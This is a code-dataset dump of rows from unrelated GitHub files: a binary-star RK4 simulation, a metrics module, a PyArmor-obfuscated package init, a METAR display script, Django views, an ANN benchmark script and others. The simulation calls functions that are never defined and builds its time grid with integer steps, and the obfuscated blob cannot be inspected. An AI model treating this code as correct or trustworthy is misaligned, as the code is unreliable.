hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3c4027e0a85dd326115e24d1e6e1369d17bbdebc | 3,135 | py | Python | rh_project/pick_six.py | hrichstein/phys_50733 | a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b | [
"MIT"
] | null | null | null | rh_project/pick_six.py | hrichstein/phys_50733 | a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b | [
"MIT"
] | null | null | null | rh_project/pick_six.py | hrichstein/phys_50733 | a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
# from scipy.constants import G
# Setting plotting parameters
# Plot styling: LaTeX-rendered, bold serif (Computer Modern) figures.
from matplotlib import rc,rcParams
rc('text', usetex=True)
rc('axes', linewidth=2)
rc('font', weight='bold')
rc('font', **{'family': 'serif', 'serif':['Computer Modern']})
# def rk4_func(params):
# s1, s2, p, vs1, vs2, vp = params
# s1x, s1y = s1
# s2x, s2y = s2
# px, py = p
# # s1_vx, s1_vy = vs1
# # s2_vx, s2_vy = vs2
# # p_vx, p_vy = vp
# a1x = -G * red_mass * 0.1 / np.sqrt(0.1)**3
# a1y = -G * red_mass * 0 / np.sqrt(0.1)**3
# # R1px = abs(s1x - px)
# # R1py = abs(s1y - py)
# # R2px = abs(s2x - px)
# # R2py = abs(s2y - py)
# # R12x = abs(s1x - s2x)
# # R12y = abs(s1y - s2y)
# # R1p = np.sqrt((s1x - px)**2 + (s1y - py)*2)
# # R2p = np.sqrt((s2x - px)**2 + (s2y - py)*2)
# # R12 = A # global variable
# # a1_2x = -G * M1 * R12x / R12**3
# # a1_2y = -G * M1 * R12y / R12**3
# # a2_1x = -G * M2 * R12x
# Constants
G = 4 * np.pi**2 # AU^3 yr^-2 M_sun^-1 (gravitational constant in solar units)
A = 0.2 # AU  (binary separation)
r = A/2 # semi-major axis & radius
test_plan = 1 # AU  (test planet's initial distance)
# Integration window [a, b] in years, split into N steps of size h.
a = 0
b = .02
N = 100000
h = (b-a)/N
M1 = 1
M2 = 1
red_mass = M1*M2/(M1+M2)  # reduced mass of the two stars
# NOTE(review): dtype=int with a fractional step (h = 2e-7) looks wrong —
# the sample times collapse to integers; confirm whether float was intended.
tpoints = np.arange(a, b, h, dtype=int)
# Initial positions: stars on opposite sides of the origin, planet at test_plan.
s1 = np.array([r, 0], float)
s2 = np.array([-r,0], float)
p = np.array([test_plan, 0], float)
# NOTE(review): find_vel_init is not defined anywhere in this script — as
# written these calls raise NameError; the implementation may live elsewhere
# or still be TODO.
s_vel = find_vel_init(M1, red_mass, r)
# s_vel = np.sqrt(10*G*red_mass)
p_vel = find_vel_init(red_mass, 0, test_plan)
print(s_vel)
# Initial velocities: stars counter-orbit (opposite tangential directions).
s1_v0 = np.array([0, s_vel], float)
s2_v0 = np.array([0, -s_vel], float)
p_v0 = np.array([0, p_vel], float)
all_params = np.array([s1, s2, p, s1_v0, s2_v0, p_v0])  # assembled but not used below
# Per-timestep output buffers for the trajectories.
xpts_s1 = [[] for tt in range(len(tpoints))]
ypts_s1 = [[] for tt in range(len(tpoints))]
xpts_s2 = [[] for tt in range(len(tpoints))]
ypts_s2 = [[] for tt in range(len(tpoints))]
xpts_p = [[] for tt in range(len(tpoints))]
ypts_p = [[] for tt in range(len(tpoints))]
s_ghet = np.array([s1[0], s1[1], s1_v0[0], s1_v0[1]])  # star-1 state [x, y, vx, vy]
# Classic fourth-order Runge-Kutta integration of the star-1 state.
# NOTE(review): ghetto() (the derivative function) is not defined in this
# script — presumably the commented-out rk4_func above was meant to become
# it; confirm.
for tt in range(len(tpoints)):
    xpts_s1[tt] = s_ghet[0]
    ypts_s1[tt] = s_ghet[1]
    k1 = h * ghetto(s_ghet)
    k2 = h * ghetto(s_ghet + 0.5*k1)
    k3 = h * ghetto(s_ghet + 0.5*k2)
    k4 = h * ghetto(s_ghet + k3)
    s_ghet += (k1 + 2*k2 + 2*k3 + k4) / 6
    # print(s_ghet[0])
plt.plot(xpts_s1, ypts_s1)
plt.show()
# def f(s,t):
# x, y, vx, vy = s
# R = np.sqrt(x**2 + y**2)
# ax = (-GMsun * x )/R ** 3
# ay = (-GMsun * y )/R ** 3
# return np.array([vx, vy, ax, ay])
# r0 = np.array([r, 0.0], float)
# v0 = np.array([0, -s_vel], float)
# s = np.array([r0[0], r0[1], v0[0], v0[1]])
# for tt in :
# solution[j] = s
# k1 = h*f(s,t)
# k2 = h*f(s+0.5*k1,t+0.5*h)
# k3 = h*f(s+0.5*k2,t+0.5*h)
# k4 = h*f(s+k3,t+h)
# s += (k1+2*k2+2*k3+k4)/6
3c42036c78c029c70b9f27f5eeeede981c311ba5 | 1,704 | py | Python | recoda/analyse/python/metrics.py | hansendx/recoda | 09e25843376613b17c6b42d45e30b895b24a7d9d | [
"MIT"
] | null | null | null | recoda/analyse/python/metrics.py | hansendx/recoda | 09e25843376613b17c6b42d45e30b895b24a7d9d | [
"MIT"
] | null | null | null | recoda/analyse/python/metrics.py | hansendx/recoda | 09e25843376613b17c6b42d45e30b895b24a7d9d | [
"MIT"
] | null | null | null | """ Provides functionality to calculate software metrics in python projects.
"""
from recoda.analyse.python import (
_general,
_installability,
_understandability,
_verifiability,
_correctness,
)
from recoda.analyse.independent import (
learnability,
openness
)
# pylint: disable-msg=c0103
# For now this seems to be the most streamline method of decentralization
# of this module. We want to call all functions via the metrics but we do
# not want it to be too long and unreadable. Wrapping the private module
# functions into a barebones would just lead to a lot more unnecessary code.
# Each public name below re-exports one metric function from a (mostly
# private) submodule, so callers can address everything via this module.
# Installability related metrics.
#packageability = _installability.packageability
packageability = _installability.packageability
requirements_declared = _installability.requirements_declared
docker_setup = _installability.docker_setup
singularity_setup = _installability.singularity_setup
# Learnability related metrics.
project_readme_size = learnability.project_readme_size
project_doc_size = learnability.project_doc_size
flesch_reading_ease = learnability.flesch_reading_ease
flesch_kincaid_grade = learnability.flesch_kincaid_grade
readme_flesch_reading_ease = learnability.readme_flesch_reading_ease
readme_flesch_kincaid_grade = learnability.readme_flesch_kincaid_grade
# Understandability related metrics.
average_comment_density = _understandability.average_comment_density
standard_compliance = _understandability.standard_compliance
# Openness related metrics.
license_type = openness.license_type
# Verifiability related metrics.
testlibrary_usage = _verifiability.testlibrary_usage
# Correctness related metrics.
error_density = _correctness.error_density
# General
loc = _general.count_loc | 29.894737 | 76 | 0.834507 |
3c42183d7ca6ff665b6de8859306ffa82f1f09f2 | 1,667 | py | Python | legacy/functional_code/pulson440/__init__.py | jjimmykang/bwsi-backprojection | 440e21f90e2a1d0d1c28bfd9a0faaf97129378a5 | [
"MIT"
] | 1 | 2020-02-09T19:09:27.000Z | 2020-02-09T19:09:27.000Z | legacy/functional_code/pulson440/__init__.py | jjimmykang/bwsi-backprojection | 440e21f90e2a1d0d1c28bfd9a0faaf97129378a5 | [
"MIT"
] | null | null | null | legacy/functional_code/pulson440/__init__.py | jjimmykang/bwsi-backprojection | 440e21f90e2a1d0d1c28bfd9a0faaf97129378a5 | [
"MIT"
] | null | null | null | __pyarmor__(__name__, __file__, b'\xe2\x50\x8c\x64\x26\x42\xd6\x01\x5c\x5c\xf8\xa8\x85\x0c\x21\xe7\x0a\xa2\x45\x58\x6e\xc9\x3c\xd5\x55\x40\x64\x69\x7d\x5f\x63\xcb\x41\xdc\x71\xdf\x4d\x82\x99\xc8\xc1\x98\xfd\x46\x67\x20\x2f\xed\x4b\xf6\xf9\x41\x55\x5c\x47\x3c\x78\x07\x75\x5d\x9b\x88\xa2\x6e\x5e\x78\xf3\x9c\x88\xba\xed\x07\xab\xfe\x63\x70\x5d\x62\xc4\xbe\xfd\x5d\x4c\x32\x27\x59\x91\x67\x1e\xb0\x09\xec\x0b\x12\x11\x95\xce\xb2\xee\x37\xe2\x0e\x96\xb7\x83\x5e\x28\x3a\xde\x3f\xd7\xea\x21\x4b\xeb\x6e\x65\x36\x4c\x34\x8b\xd6\x28\x44\x50\x1e\xd0\xe8\x0b\xd9\x61\x73\x2c\xb2\x29\xf7\x42\xb4\x2e\x08\x97\x23\xd0\xd3\x76\xcf\xf0\xe9\xb7\x3c\x9e\xc4\x57\xc6\xab\x9f\xbb\xbb\x63\xc3\x80\xf3\x9d\x1e\x6d\x3c\xaf\x91\x80\x55\xbb\xc8\xa2\x26\x03\x92\xdd\x15\x99\x70\x84\xc0\xcd\x34\xcf\x1f\x23\xea\xba\xad\x7a\x1e\xe1\xb6\x93\xed\x61\xa7\xf2\x15\x58\x20\x19\x08\xca\x8c\x31\x89\x05\x52\x81\xde\xfa\x76\x9a\xa3\x91\x5b\x25\xb8\x2b\xd0\x4f\xfb\x4a\x92\x15\x71\x4f\x8e\xf2\x6e\xe8\xdb\x23\xb4\x9f\xee\x94\xd0\x7a\x58\xeb\x22\xb7\x25\x08\xac\x2e\xf9\xa1\x0c\x37\xc5\xe8\x58\xe6\x26\xaf\x21\xce\x28\x4c\xdf\x09\xdc\xf8\xd7\x78\xe5\xc2\xb7\x32\x78\x09\x03\xf7\x28\x4f\x25\xc6\xe8\x87\x28\xef\x7a\x84\x1b\x88\x23\x5d\xf4\x6c\xf4\x0c\xa2\x02\x3b\x2e\x56\x30\xcd\x24\xff\x8f\xb8\xb0\x7c\x7c\x2e\x84\x60\x13\x25\xfe\xcc\x1b\x2d\xa3\xe1\xe2\x45\xff\x3f\x0b\xfe\xca\x49\x50\xbd\x3d\x64\x8e\xb5\xe9\x62\xcf\xaf\xb7\x99\x80\x7a\xfc\xdf\x31\x65\xf1\x24\xd9\xec\x50\xd9\x7f\xd0\xf6\x4a\xcd\xfc\x3d\x7e\xfd\xf8\x3c\xd5\x16\xfe\x8a\x68\xb7\xf3\xf2\x13\x1d\xa9\x91\x9a\x51\x8e\xc0\xa5\x81\x04\xd6\x08\x90\xf1\xcd\x69\x01\x2b\xd5\x29\xe3\x4e\x7b\x16\x4a\xf6\x61\xd8\x1f\xde\x87\xb2\x40\x8d\x68', 1) | 1,667 | 1,667 | 0.74985 |
3c43222bbb55fdc6b4f2d6c2fab0d2b77fcb11ea | 3,278 | py | Python | metarmap/commands/display.py | wastrachan/metarmap | 2ff9bc3e94d731b83470c2283bfb67600143d719 | [
"MIT"
] | null | null | null | metarmap/commands/display.py | wastrachan/metarmap | 2ff9bc3e94d731b83470c2283bfb67600143d719 | [
"MIT"
] | null | null | null | metarmap/commands/display.py | wastrachan/metarmap | 2ff9bc3e94d731b83470c2283bfb67600143d719 | [
"MIT"
] | null | null | null | import datetime
import os
import textwrap
import click
from PIL import Image, ImageDraw, ImageFont
from metarmap.configuration import config, debug, get_display_lock_content, set_display_lock_content
from metarmap.libraries.aviationweather import metar
from metarmap.libraries.waveshare_epd import epd2in13_V2
# Font setup: all faces are loaded from the system FreeFont directory.
FONTDIR = os.path.abspath('/usr/share/fonts/truetype/freefont/')
# Body faces at 13 pt, title faces at 15 pt; regular and bold of each.
FONT = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSans.ttf'), 13)
FONT_BOLD = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSansBold.ttf'), 13)
FONT_TITLE = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSans.ttf'), 15)
FONT_TITLE_BOLD = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSansBold.ttf'), 15)
| 38.116279 | 106 | 0.701647 |
3c4462f1e63b1c59a4923c8fbfbe9795c85ccd1c | 3,234 | py | Python | electionleaflets/apps/leaflets/views.py | electionleaflets/electionleaflets | 4110e96a3035c32d0b6ff3c9f832c5e003728170 | [
"MIT"
] | null | null | null | electionleaflets/apps/leaflets/views.py | electionleaflets/electionleaflets | 4110e96a3035c32d0b6ff3c9f832c5e003728170 | [
"MIT"
] | 23 | 2015-02-19T14:02:23.000Z | 2015-04-30T11:14:01.000Z | electionleaflets/apps/leaflets/views.py | electionleaflets/electionleaflets | 4110e96a3035c32d0b6ff3c9f832c5e003728170 | [
"MIT"
] | 2 | 2015-02-02T19:39:54.000Z | 2017-02-08T09:19:53.000Z | import os
from django.template import RequestContext
from django.shortcuts import render_to_response, get_object_or_404, redirect
from django.contrib.formtools.wizard.views import NamedUrlSessionWizardView
from django.core.urlresolvers import reverse
from django.conf import settings
from django.views.generic import DetailView, ListView, DetailView
from django.core.files.storage import FileSystemStorage
from .models import Leaflet, LeafletImage
# def view_full_image(request, image_key):
#
# li = LeafletImage.objects.filter(pk=image_key)
# if li.count() == 1:
# li = get_object_or_404(LeafletImage, image_key=image_key)
# else:
# # Should not do this, we'll need to fix it
# # probably and upload artifact
# li = li.all()[0]
#
# return render_to_response('leaflets/full.html',
# {
# 'image': li,
# 'leaflet': li.leaflet,
# },
# context_instance=RequestContext(request), )
def view_all_full_images(request, leafletid):
    """Render every image attached to one leaflet at full size.

    Looks up the leaflet by primary key (404 when absent), collects all
    of its associated images and renders ``leaflets/full_all.html`` with
    both in the template context.
    """
    from leaflets.models import Leaflet, LeafletImage
    leaflet = get_object_or_404(Leaflet, pk=leafletid)
    leaflet_images = LeafletImage.objects.filter(leaflet=leaflet)
    context = {
        'images': leaflet_images,
        'leaflet': leaflet,
    }
    return render_to_response(
        'leaflets/full_all.html',
        context,
        context_instance=RequestContext(request),
    )
| 33.6875 | 79 | 0.629252 |
3c44954b74ac962e577c29775c64025c256cc805 | 3,409 | py | Python | Heap/heap.py | jeremy2918/data-structures | 17685212aac38979929ca923eb2f9b989c74d07a | [
"MIT"
] | 1 | 2021-12-14T19:57:28.000Z | 2021-12-14T19:57:28.000Z | Heap/heap.py | jeremy2918/data-structures | 17685212aac38979929ca923eb2f9b989c74d07a | [
"MIT"
] | null | null | null | Heap/heap.py | jeremy2918/data-structures | 17685212aac38979929ca923eb2f9b989c74d07a | [
"MIT"
] | null | null | null | # Min Heap Implementation
| 29.387931 | 78 | 0.566442 |
3c460fdfda615228be90ea72ed8b2f5c151649c7 | 16,921 | py | Python | benchmarks/benchmark_script.py | oddconcepts/n2o | fe6214dcc06a1b13be60733c53ac25bca3c2b4d0 | [
"Apache-2.0"
] | 2 | 2019-02-13T12:59:27.000Z | 2020-01-28T02:02:47.000Z | benchmarks/benchmark_script.py | oddconcepts/n2o | fe6214dcc06a1b13be60733c53ac25bca3c2b4d0 | [
"Apache-2.0"
] | 2 | 2019-06-25T10:00:57.000Z | 2019-10-26T14:55:23.000Z | benchmarks/benchmark_script.py | oddconcepts/n2o | fe6214dcc06a1b13be60733c53ac25bca3c2b4d0 | [
"Apache-2.0"
] | 1 | 2021-11-03T14:59:27.000Z | 2021-11-03T14:59:27.000Z | # This code is based on the code
# from ann-benchmark repository
# created by Erik Bernhardsson
# https://github.com/erikbern/ann-benchmarks
import gzip
import numpy
import time
import os
import multiprocessing
import argparse
import pickle
import resource
import random
import math
import logging
import shutil
import subprocess
import sys
import tarfile
from contextlib import closing
try:
xrange
except NameError:
xrange = range
try:
from urllib2 import urlopen
except ImportError:
from urllib.request import urlopen
from n2 import HnswIndex
n2_logger = logging.getLogger("n2_benchmark")
n2_logger.setLevel(logging.INFO)
# Set resource limits to prevent memory bombs
memory_limit = 12 * 2**30
soft, hard = resource.getrlimit(resource.RLIMIT_DATA)
if soft == resource.RLIM_INFINITY or soft >= memory_limit:
n2_logger.info('resetting memory limit from {0} to {1}. '.format(soft, memory_limit))
resource.setrlimit(resource.RLIMIT_DATA, (memory_limit, hard))
INDEX_DIR='indices'
DATA_DIR = './datasets/'
GLOVE_DIR = DATA_DIR + 'glove.txt'
SIFT_DIR = DATA_DIR + 'sift.txt'
YOUTUBE_DIR = DATA_DIR + 'youtube.txt'
def run_algo(args, library, algo, results_fn):
    """Build the index for one algorithm configuration, benchmark it
    against the precomputed ground truth, and append one result row
    (library, algo, build time, best query time, best precision) to
    ``results_fn``.

    NOTE(review): relies on the module-level globals ``queries`` (list of
    ``(vector, correct_neighbour_ids)`` pairs) and ``GT_SIZE``, which are
    set up in the ``__main__`` block; it is launched there in a forked
    subprocess so index memory is reclaimed on exit.
    """
    # NOTE(review): this pool is created and immediately closed without
    # being used — looks vestigial; confirm before removing.
    pool = multiprocessing.Pool()
    X_train, X_test = get_dataset(which=args.dataset, data_size=args.data_size, test_size=args.test_size, random_state = args.random_state)
    pool.close()
    pool.join()
    # Time the index build.
    t0 = time.time()
    algo.fit(X_train)
    build_time = time.time() - t0
    n2_logger.info('Built index in {0}'.format(build_time))
    best_search_time = float('inf')
    best_precision = 0.0 # should be deterministic but paranoid
    try_count = args.try_count
    for i in xrange(try_count): # Do multiple times to warm up page cache, use fastest
        results = []
        search_time = 0.0
        current_query = 1
        total_queries = len(queries)
        for j in range(total_queries):
            v, correct = queries[j]
            sys.stdout.write("Querying: %d / %d \r" % (current_query, total_queries))
            # Time only the nearest-neighbour query itself.
            t0 = time.time()
            found = algo.query(v, GT_SIZE)
            search_time += (time.time() - t0)
            if len(found) < len(correct):
                n2_logger.info('found: {0}, correct: {1}'.format(len(found), len(correct)))
            current_query += 1
            # Per-query recall: how many true neighbours were returned.
            results.append(len(set(found).intersection(correct)))
        k = float(sum(results))
        search_time /= len(queries)
        precision = k / (len(queries) * GT_SIZE)
        # Keep the fastest run and the best precision across attempts.
        best_search_time = min(best_search_time, search_time)
        best_precision = max(best_precision, precision)
        sys.stdout.write('*[%d/%d][algo: %s] search time: %s, precision: %.5f \r' % (i+1, try_count, str(algo), str(search_time), precision))
    sys.stdout.write('\n')
    # Append one tab-separated result row to the shared results file.
    output = [library, algo.name, build_time, best_search_time, best_precision]
    n2_logger.info(str(output))
    f = open(results_fn, 'a')
    f.write('\t'.join(map(str, output)) + '\n')
    f.close()
    n2_logger.info('Summary: {0}'.format('\t'.join(map(str, output))))
def get_dataset(which='glove', data_size=-1, test_size = 10000, random_state = 3):
    """Load the train/test split for ``which``, building and caching it on
    first use.

    Args:
        which: Dataset name; reads ``datasets/<which>.txt`` (or ``.gz``).
        data_size: Maximum number of vectors to load, or -1 for all.
        test_size: Number of held-out query vectors.
        random_state: Seed for the reproducible train/test split.

    Returns:
        ``(X_train, X_test)`` float64 arrays; the split is cached as an
        ``.npz`` under ``queries/``.
    """
    # Fixed: the cache key previously used the module-global ``args.data_size``,
    # which only exists when running as a script — use the ``data_size``
    # parameter so the function also works when imported.
    cache = 'queries/%s-%d-%d-%d.npz' % (which, max(data_size, 0), test_size, random_state)
    if os.path.exists(cache):
        v = numpy.load(cache)
        X_train = v['train']
        X_test = v['test']
        n2_logger.info('{0} {1}'.format(X_train.shape, X_test.shape))
        return X_train, X_test
    local_fn = os.path.join('datasets', which)
    if os.path.exists(local_fn + '.gz'):
        f = gzip.open(local_fn + '.gz')
    else:
        f = open(local_fn + '.txt')
    # One whitespace-separated vector per line; stop early at data_size.
    X = []
    for i, line in enumerate(f):
        v = [float(x) for x in line.strip().split()]
        X.append(v)
        if data_size != -1 and len(X) == data_size:
            break
    f.close()  # previously leaked until interpreter exit
    X = numpy.vstack(X)
    # NOTE(review): sklearn.cross_validation was removed in scikit-learn 0.20
    # (use sklearn.model_selection); kept for the pinned environment this
    # benchmark targets.
    import sklearn.cross_validation
    # Here Erik is most welcome to use any other random_state
    # However, it is best to use a new random seed for each major re-evaluation,
    # so that we test on a trully bind data.
    X_train, X_test = sklearn.cross_validation.train_test_split(X, test_size=test_size, random_state=random_state)
    # numpy.float was removed in NumPy 1.24; float64 is the same dtype.
    X_train = X_train.astype(numpy.float64)
    X_test = X_test.astype(numpy.float64)
    numpy.savez(cache, train=X_train, test=X_test)
    return X_train, X_test
def get_queries(args):
    """Compute the ground-truth nearest neighbours for every test vector.

    Returns a list of ``(query_vector, correct_neighbour_ids)`` pairs,
    where the correct neighbours are found by brute force over the
    training set.

    NOTE(review): ``BruteForceBLAS`` is not imported in the visible part
    of this file — confirm it is defined/imported elsewhere.
    """
    n2_logger.info('computing queries with correct results...')
    bf = BruteForceBLAS(args.distance)
    X_train, X_test = get_dataset(which=args.dataset, data_size=args.data_size, test_size=args.test_size, random_state=args.random_state)
    # Prepare queries
    bf.fit(X_train)
    queries = []
    total_queries = len(X_test)
    for x in X_test:
        # GT_SIZE true neighbours per query (module global set in __main__).
        correct = bf.query(x, GT_SIZE)
        queries.append((x, correct))
        sys.stdout.write('computing queries %d/%d ...\r' % (len(queries), total_queries))
    sys.stdout.write('\n')
    return queries
def get_fn(base, args):
    """Build the per-run file path under ``base`` for the current settings.

    The name encodes dataset, optional data/test sizes and the random
    seed (e.g. ``results/glove-10000-3.txt``). Prefers an existing
    ``.gz`` file, otherwise uses ``.txt``, and makes sure the parent
    directory exists.
    """
    path = os.path.join(base, args.dataset)
    if args.data_size != -1:
        path += '-%d' % args.data_size
    if args.test_size != -1:
        path += '-%d' % args.test_size
    path += '-%d' % args.random_state
    path += '.gz' if os.path.exists(path + '.gz') else '.txt'
    parent = os.path.dirname(path)
    if not os.path.exists(parent):
        os.makedirs(parent)
    return path
def download_file(url, dst):
    """Stream ``url`` into the ``dst`` directory, printing progress.

    The local file keeps the remote basename; progress is reported
    against the Content-Length response header.
    """
    file_name = url.split('/')[-1]
    with closing(urlopen(url)) as res:
        with open(dst+"/"+file_name, 'wb') as f:
            file_size = int(res.headers["Content-Length"])
            sys.stdout.write("Downloading datasets %s\r" % (file_name))
            file_size_dl = 0
            block_sz = 10240  # 10 KiB read chunks
            while True:
                buffer = res.read(block_sz)
                if not buffer:
                    # EOF: whole response body consumed.
                    break
                file_size_dl += len(buffer)
                f.write(buffer)
                sys.stdout.write("Downloading datasets %s: %d / %d bytes\r" % (file_name, file_size_dl, file_size))
    sys.stdout.write('\n')
if __name__ == '__main__':
    # Entry point: parse CLI options, fetch/prepare the dataset, compute
    # (or load cached) ground-truth queries, then run each algorithm
    # configuration in its own subprocess.
    # NOTE(review): ``global`` at module level is a no-op; GT_SIZE becomes a
    # module global either way.
    global GT_SIZE
    parser = argparse.ArgumentParser()
    parser.add_argument('--distance', help='Distance metric', default='angular')
    parser.add_argument('--try_count', help='Number of test attempts', type=int, default=3)
    parser.add_argument('--dataset', help='Which dataset', default='glove')
    parser.add_argument('--data_size', help='Maximum # of data points', type=int, default=-1)
    parser.add_argument('--test_size', help='Maximum # of data queries', type=int, default=10000)
    parser.add_argument('--n_threads', help='Number of threads', type=int, default=10)
    parser.add_argument('--random_state', help='Random seed', type=int, default=3)
    parser.add_argument('--algo', help='Algorithm', type=str)
    args = parser.parse_args()
    if not os.path.exists(DATA_DIR):
        os.makedirs(DATA_DIR)
    numpy.random.seed(args.random_state)
    # Ground-truth size (neighbours per query) depends on the dataset.
    if args.dataset == 'glove':
        GT_SIZE = 10
    elif args.dataset == 'sift':
        GT_SIZE = 10
    elif args.dataset == 'youtube':
        GT_SIZE = 100
    else:
        print('Invalid dataset: {}'.format(args.dataset))
        exit(0)
    print('* GT size: {}'.format(GT_SIZE))
    # Download/convert the requested dataset when missing on disk.
    if args.dataset == 'glove' and not os.path.exists(GLOVE_DIR):
        download_file("https://s3-us-west-1.amazonaws.com/annoy-vectors/glove.twitter.27B.100d.txt.gz", "datasets")
        with gzip.open('datasets/glove.twitter.27B.100d.txt.gz', 'rb') as f_in, open('datasets/glove.twitter.27B.100d.txt', 'wb') as f_out:
            shutil.copyfileobj(f_in, f_out)
        # Drop the leading word column, keeping only the vector components.
        subprocess.call("cut -d \" \" -f 2- datasets/glove.twitter.27B.100d.txt > datasets/glove.txt", shell=True)
    if args.dataset == 'sift' and not os.path.exists(SIFT_DIR):
        download_file("ftp://ftp.irisa.fr/local/texmex/corpus/sift.tar.gz", "datasets")
        with tarfile.open("datasets/sift.tar.gz") as t:
            t.extractall(path="datasets")
        subprocess.call("python datasets/convert_texmex_fvec.py datasets/sift/sift_base.fvecs >> datasets/sift.txt", shell=True)
    if args.dataset == 'youtube' and not os.path.exists(YOUTUBE_DIR):
        raise IOError('Please follow the instructions in the guide to download the YouTube dataset.')
    results_fn = get_fn('results', args)
    queries_fn = get_fn('queries', args)
    logging.info('storing queries in {0} and results in {1}.'.format(queries_fn, results_fn))
    # Ground-truth queries are expensive to compute; cache them on disk.
    if not os.path.exists(queries_fn):
        queries = get_queries(args)
        with open(queries_fn, 'wb') as f:
            pickle.dump(queries, f)
    else:
        queries = pickle.load(open(queries_fn, 'rb'))
    logging.info('got {0} queries'.format(len(queries)))
    # NOTE(review): Annoy, N2 and NmslibReuseIndex wrapper classes are not
    # imported in the visible part of this file — confirm where they are
    # defined.
    algos = {
        'annoy': [ Annoy('angular', n_trees, search_k)
            for n_trees in [10, 50, 100]
            for search_k in [ 7, 3000, 50000, 200000, 500000]
        ],
        'n2': [ N2(M, ef_con, args.n_threads, ef_search, 'angular')
            for M, ef_con in [ (12, 100)]
            for ef_search in [1, 10, 25, 50, 100, 250, 500, 750, 1000, 1500, 2500, 5000, 10000, 100000]
        ],
        'nmslib': []}
    # nmslib (hnsw) configurations: one shared build config, swept over ef.
    MsPostsEfs = [
        ({'M': 12,
          'post': 0,
          'indexThreadQty': args.n_threads,
          'delaunay_type': 2,
          'efConstruction': 100,
          },
         [1, 10, 25, 50, 100, 250, 500, 750, 1000, 1500, 2000, 2500],
         ),
    ]
    for oneCase in MsPostsEfs:
        for ef in oneCase[1]:
            params = ['%s=%s' % (k, str(v)) for k, v in oneCase[0].items()]
            algos['nmslib'].append(
                NmslibReuseIndex( 'angular', 'hnsw', params, True, ['ef=%d' % ef]))
    algos_flat = []
    # Optionally restrict the run to a single library.
    if args.algo:
        print('running only: %s' % str(args.algo))
        algos = {args.algo: algos[args.algo]}
    for library in algos.keys():
        for algo in algos[library]:
            algos_flat.append((library, algo))
    # Shuffle so long runs interleave libraries rather than batching them.
    random.shuffle(algos_flat)
    logging.debug('order: %s' % str([a.name for l, a in algos_flat]))
    for library, algo in algos_flat:
        logging.info(algo.name)
        # Spawn a subprocess to force the memory to be reclaimed at the end
        p = multiprocessing.Process(target=run_algo, args=(args, library, algo, results_fn))
        p.start()
        p.join()
| 37.602222 | 166 | 0.61929 |
3c48c2125ebec3cfbc2f8abe3432087a8f247884 | 28 | py | Python | ars/__init__.py | david-lindner/ARS | acfe403ebe90c157d61690a9498597244853fc78 | [
"BSD-2-Clause"
] | null | null | null | ars/__init__.py | david-lindner/ARS | acfe403ebe90c157d61690a9498597244853fc78 | [
"BSD-2-Clause"
] | null | null | null | ars/__init__.py | david-lindner/ARS | acfe403ebe90c157d61690a9498597244853fc78 | [
"BSD-2-Clause"
] | null | null | null | from .ars import ARSLearner
| 14 | 27 | 0.821429 |
3c4c370cfd780bfee437676b79c4d199589eb48b | 618 | py | Python | setup.py | elaru/python3-cre | 84863b5acaab5f903a3d3b2a1b6a2cb10ed00679 | [
"0BSD"
] | null | null | null | setup.py | elaru/python3-cre | 84863b5acaab5f903a3d3b2a1b6a2cb10ed00679 | [
"0BSD"
] | null | null | null | setup.py | elaru/python3-cre | 84863b5acaab5f903a3d3b2a1b6a2cb10ed00679 | [
"0BSD"
] | null | null | null | from setuptools import setup
# Packaging metadata for the ``cre`` regular-expression processor.
setup(
    name="cre",
    packages=["cre"],
    version="0.1.0",
    author="Philipp Schiffmann",
    author_email="philippschiffmann@icloud.com",
    url="https://github.com/elaru/python3-cre",
    description="A regular expression processor implemented in python.",
    license="ISC",
    classifiers=[
        "Development Status :: 2 - Pre-Alpha",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: ISC License (ISCL)",
        "Operating System :: OS Independent",
        "Programming Language :: Python",
        "Programming Language :: Python :: 2",
        "Programming Language :: Python :: 3"
    ]
)
| 28.090909 | 69 | 0.676375 |
3c4ce0be200904020cc2f4b6271e9daccb20ccb2 | 284 | py | Python | bin/const.py | Novartole/Video-pixels | 10246d1953289e1cded43ed63104f5343a3d9e65 | [
"MIT"
] | null | null | null | bin/const.py | Novartole/Video-pixels | 10246d1953289e1cded43ed63104f5343a3d9e65 | [
"MIT"
] | null | null | null | bin/const.py | Novartole/Video-pixels | 10246d1953289e1cded43ed63104f5343a3d9e65 | [
"MIT"
] | null | null | null | import enum
DEFAULT_FILE_NAME = 'DEFAULT'
RANDOM_MIX_CONFIG_NAME = 'RandomMix'
WIDTH_NAME = 'Width'
HIGHT_NAME = 'Hight' | 20.285714 | 61 | 0.760563 |
3c4dca815ed01033d3b7eadeef2709708a553018 | 1,902 | py | Python | src/nr/util/orderedset.py | NiklasRosenstein/python-nr.util | 087f2410d38006c1005a5fb330c47a56bcdb2279 | [
"MIT"
